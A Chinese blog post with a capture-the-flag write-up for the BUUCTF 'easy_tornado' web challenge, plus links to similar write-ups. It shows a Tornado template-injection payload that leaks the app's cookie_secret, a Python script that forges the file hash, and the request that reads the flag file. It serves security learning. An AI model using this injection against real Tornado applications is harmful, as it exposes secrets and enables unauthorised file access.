BUUCTF WEB [护网杯 2018]easy_tornado

最新推荐文章于 2024-06-18 14:37:36 发布
最新推荐文章于 2024-06-18 14:37:36 发布
阅读量651 收藏
点赞数
分类专栏: BUUCTF 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51412071/article/details/124230409
版权

BUUCTF WEB [护网杯 2018]easy_tornado

  • 进入环境,发现三个文件

    • /flag.txt

      flag in /fllllllllllllag

    • /welcome.txt

      render

    • /hints.txt

      md5(cookie_secret+md5(filename))

  • 根据题目提示可知,题目环境使用python tornado模板渲染搭建,flag文件名为fllllllllllllag。观察URL可知,访问文件需要提交文件名filename和利用cookie_secretfilenamemd5加密得到的filehash

  • 我们已经知道了flag文件的filename,现在需要利用模板注入得到cookie_secret进而得到filehash

  • tornado官方文档中指出cookie_secrethandler.settings中,访问

    /error?msg={{handler.settings}}

    回显

    {'autoreload': True, 'compiled_template_cache': False, 'cookie_secret': '937d5a21-74cc-4db9-9e52-81b087c68076'}

    得到cookie_secret

脚本

import hashlib

file_hash = hashlib.md5()

filename = '/fllllllllllllag'
file_hash.update(filename.encode('utf-8'))
s1 = file_hash.hexdigest()

cookie_secret = "937d5a21-74cc-4db9-9e52-81b087c68076"

file_hash = hashlib.md5()
file_hash.update((cookie_secret + s1).encode('utf-8'))

print(file_hash.hexdigest())

# 0fe38764240c1054b4a759cb7e671a10

  • 访问

    /file?filename=/fllllllllllllag&filehash=0fe38764240c1054b4a759cb7e671a10

    回显

    /fllllllllllllag
flag{9ff46aca-4154-474e-add4-ff53fe8c382b}
Y1Daa
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
web buuctf [护网 2018]easy_tornado1
weixin_44214568的博客
03-12 4441
分解信息量: 1.题目名称是easy-tornadotornado是python的web框架(web框架的产生是避免程序代码与html编码的编码混乱性,框架将传参过程进行独立) 2.打开一共三个链接,分别点开 /flag.txt 提示内容:flag in /fllllllllllllag ,意思就是flag在文件fllllllllllllag里面,需要考虑怎么进入文件里面 /welcome.txt 提示内容:render,render是tornado里面的渲染函数,就是对web网页界面进行编辑的函
护网2018-easy tornadoBUUCTF
wyj_1216 House
02-07 2520
ssti模板注入 tornado框架 rander 题目 writeup 首先发现有三个文件,点进去看下 /flag.txt flag in /fllllllllllllag /file?filename=/flag.txt&filehash=a41fc7432da96c4b11c1bf1808f3417e /welcome.txt render /file?filename=/w...
BUUCTF [护网 2018] easy_tornado1
最新发布
m0_74167420的博客
06-18 270
Handler指向的处理当前这个页面的RequestHandler对象,handler是RequestHandler的别名,而上面又提到RequestHandler.settings是self.application.settings的别名。2、render是python中的一个渲染函数,也就是一种模板,通过调用的参数不同,生成不同的网页,如果用户对render内容可控,即可进行SSTI模板注入或者XSS注入。(4)访问出错后出现如下界面,输入{{1}},测试得出存在SSTI模板注入漏洞。
CTF-BUUCTF-Web-[护网 2018]easy_tornado
qq_42404383的博客
12-29 1345
CTF-BUUCTF-Web-[护网 2018]easy_tornado 看题: 解题: 1、flag --> 在文件 fllllllllllllag中 2、render()函数渲染 --> 用到SSTI 尝试输入/error?msg={{1}},确实是存在模板注入 3、cookie_secret 4、解题 cookie_secret --> ‘43998eab-59...
BUUCTF日记--[护网 2018]easy_tornado
weixin_41607190的博客
03-31 301
模板注入 何为模板注入,那么肯定要有模板,并且因为这个模板产生了注[狗头] 有一个叫模板引擎的东西,他能让(网页)程序实现界面与数据的分离,业务代码和逻辑的分离,为的就是提升开发效率,提高代码的重用率。 他的注入成因和web的注入成因也一样,服务端在接受用户的输入时没有过滤,在目标编译渲染时,执行了用户恶意插入的内容。 那么究竟什么是模板? 模板就是提供给程序解析的一种语法,换句话说,模板是把数据...
buuojweb刷题wp详解及知识整理—-【护网easy_tornado(模板注入+md5)
01-20
写在前面 服务端模板注入也是一种注入攻击(简称为SSTL) 这又涉及到了本人的知识盲区 借这个题学习补充一下知识 自己走过的路加wp辅助 信息收集加思路推理 ...回显 render 而且url处有异常 同理测试其他选项 ...
2018护网逆向题目
10-16
2018护网逆向题目是针对这一领域的专业挑战,旨在检验参赛者在逆向工程方面的技能和知识。这三道题目——task_Loader7.exe、task_APM233_6.exe和task_huwang-refinal-6.exe,很可能是精心设计的恶意软件或复杂程序...
2020全国工业互联网安全技术技能大赛-护网-chinaiisc2020.zip
10-24
2020全国工业互联网安全技术技能大赛,原来的护网,比赛的原题以及附件,供大家进行学习和交流。祝大家技术进步!
eLogin_登录_登录网页_密码检索_web登录_信息安全_
10-02
Web登录涉及的技术主要包括HTTP与HTTPS协议。HTTP协议虽然便捷,但数据传输不加密,容易被中间人攻击。相比之下,HTTPS使用SSL/TLS协议对通信内容进行加密,保证了数据的机密性和完整性。同时,网站应使用安全套接层...
《学校安全工作总结2018》_0.doc
09-15
《学校安全工作总结2018》是对过去一年学校安全工作的全面回顾和总结,这份文档着重强调了学校安全工作的重要性,并详细介绍了该校在安全管理方面采取的措施、取得的成效以及未来的工作规划。 首先,学校高度重视...
【CTF】buuctf web(二)——[护网 2018]easy_tornado
m0_52923241的博客
08-01 741
[护网 2018]easy_tornado 首先出来三个链接 查看flag.txt 提示flag在/fllllllllllllag中 OK,知道了第一个条件,filename=/fllllllllllllag 查看welcome.txt 查看hints.txt 分析一下 这里有两个参数,第一个参数filename,文件的名称,我们通过查看flag.txt文件知道,藏flag的文件名为fllllllllllllag;第二个参数filehash,翻译一下:文件哈希,也就是加密了 加密方法在第三个文件中md
BUUCTF[护网 2018]easy_tornado1-write up
m0_62851980的博客
04-23 900
知识点: SSTI(模板注入),render函数,Tornado框架(知识点在最后) 打开靶机,看到三个链接: 分别点进去: 注意每个链接的url: /file?filename=/xxx&filehash=32位MD5 根据flag.txt和hint.txt提示url的形式为:文件名+32位MD5 再看hint.txt的提示:md5(cookie_secret+md5(filename))。明显我们要先找到cookie_secret进行MD5加密,再和进行MD5加密后输入的文
护网 2018easy_tornado
Lixunzhe0112的博客
01-17 580
常见的注入有:SQL 注入,XSS 注入,XPATH 注入,XML注入,代码注入,命令注入等等。sql注入已经出世很多年了,对于sql注入的概念和原理很多人应该是相当清楚了,SSTI也是注入类的漏洞。错误的执行了用户输入。当然还是和sql注入有所不同的,SSTI利用的是现在的网站模板引擎(下面会提到),主要针对python、php、java的一些网站处理框架,比如Python的jinja2mako tornado django,php的smarty twig,java的jadevelocity。
[护网 2018]easy_tornado WriteUp(超级详细!)
lunan的博客
04-22 3313
[护网 2018]easy_tornado   打开题目后,首先发现3个超链接   依次点开三个链接    网址里有参数filename和filehash推测这里flag应该是 filename=/fllllllllllllag&filehash=md5(cookie_secret+md5(filename))里面,filehash里hash就是提示为md5的hash加密。    变量 filename 的值总是为要访问的文件,再根据提示三和 fil
【网络安全 | CTF】护网2018easy_tornado解题详析(Tornado之SSTI注入)
等风来
08-24 3875
提示:filename先被md5加密后,结合cookie_secret,再次被md5加密姿势进入页面给出三个链接:提示:filename先被md5加密后,结合cookie_secret,再次被md5加密先加密filename:得到:3bf9f6cf685a6dd8defadabfb41先加密filename:可知存在模板注入,而Tornado框架的附属文件handler.settings中存在cookie_secret故get传参:/error?msg={{handler.settings}}得到
[护网 2018]easy_tornado
Yb_140的博客
09-05 1597
即md5('61375ac6-5e1d-4510-a256-12786c3e1f09'+md5('/fllllllllllllag'))得到提示信息,得到cookie_secret:61375ac6-5e1d-4510-a256-12786c3e1f09。猜测这里的filehash就是md5加密得到的,我们需要找到cookie_secret。然后结合md5(cookie_secret+md5(filename)),简单来说就是用来生成模板的东西。,就是一个公式,能输出前端页面的公式。
BUUCTF--Web--[护网 2018]easy_tornado
weixin_44866139的博客
05-07 453
发现每个url后面都有一个filehash hints.txt中提示md5(cookie_secret+md5(filename)) 而flag.txt中提示flag in /fllllllllllllag 猜测flag就在fllllllllllllag文件中,关键找出cookie_secret 这里用到render()函数 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值